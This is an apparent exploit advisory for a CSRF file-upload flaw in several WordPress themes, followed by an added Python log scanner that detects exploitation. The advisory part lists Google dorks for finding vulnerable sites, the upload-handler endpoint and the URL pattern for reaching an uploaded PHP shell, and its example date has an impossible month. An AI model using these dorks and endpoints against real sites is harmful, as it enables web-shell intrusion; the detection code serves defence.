Dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/rockstar-theme/functions/upload-handler.php
File Access :
http://victim/wp-content/uploads/[year]/[month]/your_shell.php
Example :
http://127.0.0.1/wp-content/uploads/2013/13/noxs.php
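
Detection :
Added example, not part of the original advisory: a log check a site owner can run to see whether the upload handler in any of the themes listed above has received POST requests, and whether PHP files have been requested from the uploads tree. The combined access-log format, the function name scan, and the sample log lines are assumptions made for this example.

```python
import re

# Theme directories named in the advisory above.
THEMES = (
    "agritourismo-theme", "bordeaux-theme", "bulteno-theme", "oxygen-theme",
    "radial-theme", "rayoflight-theme", "reganto-theme", "rockstar-theme",
)

# Combined Log Format: ip - user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
HANDLER_RE = re.compile(
    r"/wp-content/themes/(?:%s)/functions/upload-handler\.php(?:\?|$)"
    % "|".join(map(re.escape, THEMES)),
    re.IGNORECASE,
)
# Any PHP file served from the uploads tree; that directory should hold media only.
UPLOADED_PHP_RE = re.compile(
    r"/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.ph(?:p\d?|tml)(?:\?|$)", re.IGNORECASE
)

def scan(lines):
    """Return (kind, ip, path, status) findings for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines not in combined log format
        path, status = m["path"], int(m["status"])
        if m["method"] == "POST" and HANDLER_RE.search(path):
            findings.append(("handler_post", m["ip"], path, status))
        elif UPLOADED_PHP_RE.search(path):
            findings.append(("php_in_uploads", m["ip"], path, status))
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder file names).
SAMPLE = [
    '198.51.100.7 - - [02/Mar/2013:10:00:01 +0000] "POST /wp-content/themes/rockstar-theme/functions/upload-handler.php HTTP/1.1" 200 45 "-" "-"',
    '198.51.100.7 - - [02/Mar/2013:10:00:05 +0000] "GET /wp-content/uploads/2013/03/example.php HTTP/1.1" 200 12 "-" "-"',
    '203.0.113.9 - - [02/Mar/2013:10:01:00 +0000] "GET /wp-content/uploads/2013/03/photo.jpg HTTP/1.1" 200 20480 "-" "-"',
    '203.0.113.9 - - [02/Mar/2013:10:02:00 +0000] "GET /wp-content/themes/oxygen-theme/style.css HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding of either kind on a site running one of these themes is a reason to review the uploads directory for unexpected PHP files.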